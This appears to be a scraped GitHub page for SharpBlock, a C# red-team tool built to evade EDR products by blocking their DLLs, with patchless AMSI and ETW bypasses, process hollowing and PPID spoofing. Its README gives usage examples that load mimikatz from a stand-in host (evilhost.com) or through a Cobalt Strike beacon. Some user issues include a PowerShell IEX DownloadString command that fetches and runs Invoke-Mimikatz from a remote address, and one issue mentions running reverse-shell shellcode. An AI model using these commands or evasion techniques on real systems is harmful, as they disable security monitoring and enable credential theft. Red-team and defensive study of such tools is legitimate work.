ccob / sharpblock Goto Github PK

View Code? Open in Web Editor NEW

1.1K 20.0 154.0 248 KB

A method of bypassing EDR's active projection DLL's by preventing entry point exection

C# 100.00%

sharpblock's Introduction

SharpBlock

A method of bypassing EDR's active projection DLL's by preventing entry point execution.

Features

Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.
Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.
Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike)
Implanted process is hidden to help evade scanners looking for hollowed processes.
Command line args are spoofed and implanted after process creation using stealthy EDR detection method.
Patchless ETW bypass.
Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space

SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

Examples

Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL

SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL

execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Note, for the upload_file beacon command, load upload.cna into Cobalt Strike's Script Manager

Accompanying Blog Posts:

sharpblock's People

Contributors

Stargazers

Watchers

Forkers

laowang1026 gavz bravery9 nullbind d3v53c dskho ykankaya doanhnhq-uit flatl1neapt mmg1 redteams leftp warecrash marciopocebon hakimkt jg789346bnfgewrew09876345 jack51706 topotam ndur0 m3g4byt3 dannymas ph0sph8 asdlei99 mitbad-d msf-ntdll rahmiy hatchetxuexi listinvest analyticsearch crackercat gameofwar12 jonathanzhou348 ashr fishdom888 killvxk y11en lunarobliq v4nyl axax002 dlkrcode ewilded hoclamgiauus rakjong shantanu561993 akpotter darksecarsenal idkwim askyeye red-infosec reverse-ex curtishoughton cybagard nosorry coelho-faminto jeningogo 1337g fnsank kungia09 goowen kobbycyber kibercthulhu dycsy actorexpose skybulk levisre like0x kolabszar cybercraftsmanx pyonghe superuser5 cyb0tage jymcheong lnaphade scriptidiot ocean-redemption 0xshoreditch eragon226 sh33lsh00k techris45 sepo79 morpheusc modulexcite slooppe insideus sp00ks-git koushui usama7628674 fuzzyun1c0rn korallin kopfjager007 justinforbes gl4ssesbo1 useful-gw fdlucifer oakkaya 4rchiba catannadev teachmejavatonight startagain2016 walterobailey

sharpblock's Issues

LoadProcessFormWeb not work on invalid or expired SSL certificate

[!] SharpBlock failed with error The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel.
   at System.Net.WebClient.DownloadDataInternal(Uri address, WebRequest& request)
   at System.Net.WebClient.DownloadData(Uri address)
   at SharpBlock.Program.LoadProcessFromWeb(String url)
   at SharpBlock.Program.LoadProcessData(String path)
   at SharpBlock.Program.ReplaceExecutable(IntPtr hProcess, IntPtr hThread, String path)
   at SharpBlock.Program.Main(String[] args)

i use below code Solve the problem

ServicePointManager ServerCertificateValidationCallback + = (sender, certificate chain, sslPolicyErrors) = > true;

want to add an option to ignore certificate errors.

Fails to load simple c# exe.

I have a simple c# exe that is reflecting bytes in memory. I'd like to use this tool to crush avast/avg since they're protecting amsi. Not really sure what I'm doing wrong. I'm executing it through cmd using your example but sharpblock is always throwing an error, compiled it as is no changes. Like I know I don't understand the code too well but I think I'm understanding what the tool is supposed to do. Bro I must be doing something wrong, do I need to compile my exe a certain type of way?

Failed to create process nltest.exe with error 2

Thanks for the amazing work.
I was successfully able to run the nltest /dclist: command and a DLL to patch initially.

Tried after a few days but with a different beacon and now I get an error Failed to create process nltest.exe with error 2 This is the command i execute SharpBlock.exe -e nltest.exe -a /dclist: -n XYZ.dll

Below is the response:

[*] Tasked beacon to run .NET program: SharpBlock.exe -e nltest.exe -a /dclist: -n XYZ.dll
[+] host called home, sent: 219777 bytes
[+] received output:
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x86_64 


[+] received output:
[+] in-proc amsi 0x00007ffe7a860000
[+] in-proc ntdll 0x00007ffe90580000
[!] Failed to create process nltest.exe with error 2

Any idea what can be corrected here?

PowerShell issue

Hi and thanks for the great work!

I've got a problem though. If I want to open powershell instead of cmd the process gets closed immediately.

Do you know why?

Access Denied running with -a

Hi when i run the program with -a i get access denied, it works find if i run the programs separately.

SharpBlock.exe -e c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command coffee;"

Running the powershell then calling the mimikatz works fine.

Block Multiple DLLs ?

Is it possible to block multiple dlls ? cmd and powershell crash when given multiple dll names.

for example,
.\sharpblock.exe -n "dll1.dll" -n "dll2.dll" --disable-bypass-amsi -e "c:\windows\system32\windowspowershell\v1.0\powershell.exe" --disable-bypass-etw --disable-header-patch -w

Multiple Exceptions when running SharpBlock

I cloned the repo and built it with .Net FW 4.5.

After building and running SharpBlock (with double click) I receive following errors.

No defender is activated btw.

What did I do wrong?

Detection AMSI

Hi,

Compiled it and it got flagged by AMSI.

./sharpblock.exe

SharpBlock failed with error: Failed to read memory, PartialCopy

Hi,

When executing the following command I get an error:

SharpBlock.exe -w -e C:\...\test.exe
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x86_64

[+] in-proc amsi 0x00007ff9ef520000
[+] in-proc ntdll 0x00007ffa11230000
[+] Launched process C:\...\test.exe with PID 17896
[!] SharpBlock failed with error Failed to read memory, PartialCopy
   at SharpSploit.Execution.DynamicInvoke.Native.NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, IntPtr Buffer, UInt32& NumberOfBytesToRead)
   at SharpBlock.Program.ReadBytes(IntPtr hProcess, IntPtr address, Int32 size) in C:\...\SharpBlock-master\Program.cs:line 373
   at SharpBlock.Program.ReadMovAddress(IntPtr hProcess, IntPtr address) in C:\...\SharpBlock-master\Program.cs:line 161
   at SharpBlock.Program.UpdateCommandLine(IntPtr hProcess, String args) in C:\...\SharpBlock-master\Program.cs:line 192
   at SharpBlock.Program.Main(String[] args) in C:\...\SharpBlock-master\Program.cs:line 763

I'm trying to execude a simple c# script that executes a reverse shell using shellcode (Program.cs) in order to test an EDR.

What am I doing wrong?

Thx for the awsome project

Exception 0x800000003

It appears to be a non-fatal error but I'm getting similar errors on multiple machines.

Windows [Version 10.0.18363.1440]

SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x86_64

[+] in-proc amsi 0x00007ffa54d10000
[+] in-proc ntdll 0x00007ffa73fa0000
[+] Launched process c:\windows\system32\cmd.exe with PID 204
Exception 0x80000003 occured at 0x7ffa74070f8c
        Parameter: 0x0
[+] Updated command line args with ""
Exception 0x80000003 occured at 0x7ffa74070f8c
        Parameter: 0x0

Windows [Version 10.0.19042.1083]

C:\Tools\SharpBlock\bin\x64\Release>SharpBlock.exe
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x86_64

[+] in-proc amsi 0x00007ffc654b0000
[+] in-proc ntdll 0x00007ffc7ff10000
[+] Launched process c:\windows\system32\cmd.exe with PID 18516
Exception 0x80000003 occured at 0x7ffc7ffe0770
        Parameter: 0x0
[+] Updated command line args with ""
Exception 0x80000003 occured at 0x7ffc7ffe0770
        Parameter: 0x0

Everything else appears to work fine in that cmd is actually running with that PID in the background, just I don't remember seeing those error messages last time I used SharpBlock.

0x7ffc7ffe0770 is an 0xCC (Int 3) in ntdll.dll which I believe is causing the exception:

Exception is raised here (line 967 Program.cs) :

                                if (ExceptionDebugInfo.dwFirstChance == 0 && ExceptionDebugInfo.ExceptionRecord.ExceptionCode != WinAPI.EXCEPTION_SINGLE_STEP) {
                                    Console.WriteLine($"Exception 0x{ExceptionDebugInfo.ExceptionRecord.ExceptionCode:x} occured at 0x{ExceptionDebugInfo.ExceptionRecord.ExceptionAddress.ToInt64():x}");
                                    for(int idx=0; idx< ExceptionDebugInfo.ExceptionRecord.NumberParameters; ++idx ) {
                                        Console.WriteLine($"\tParameter: 0x{ExceptionDebugInfo.ExceptionRecord.ExceptionInformation[idx]}");
                                    }

Thank you for a really great tool, anything I can do to help troubleshoot, please let me know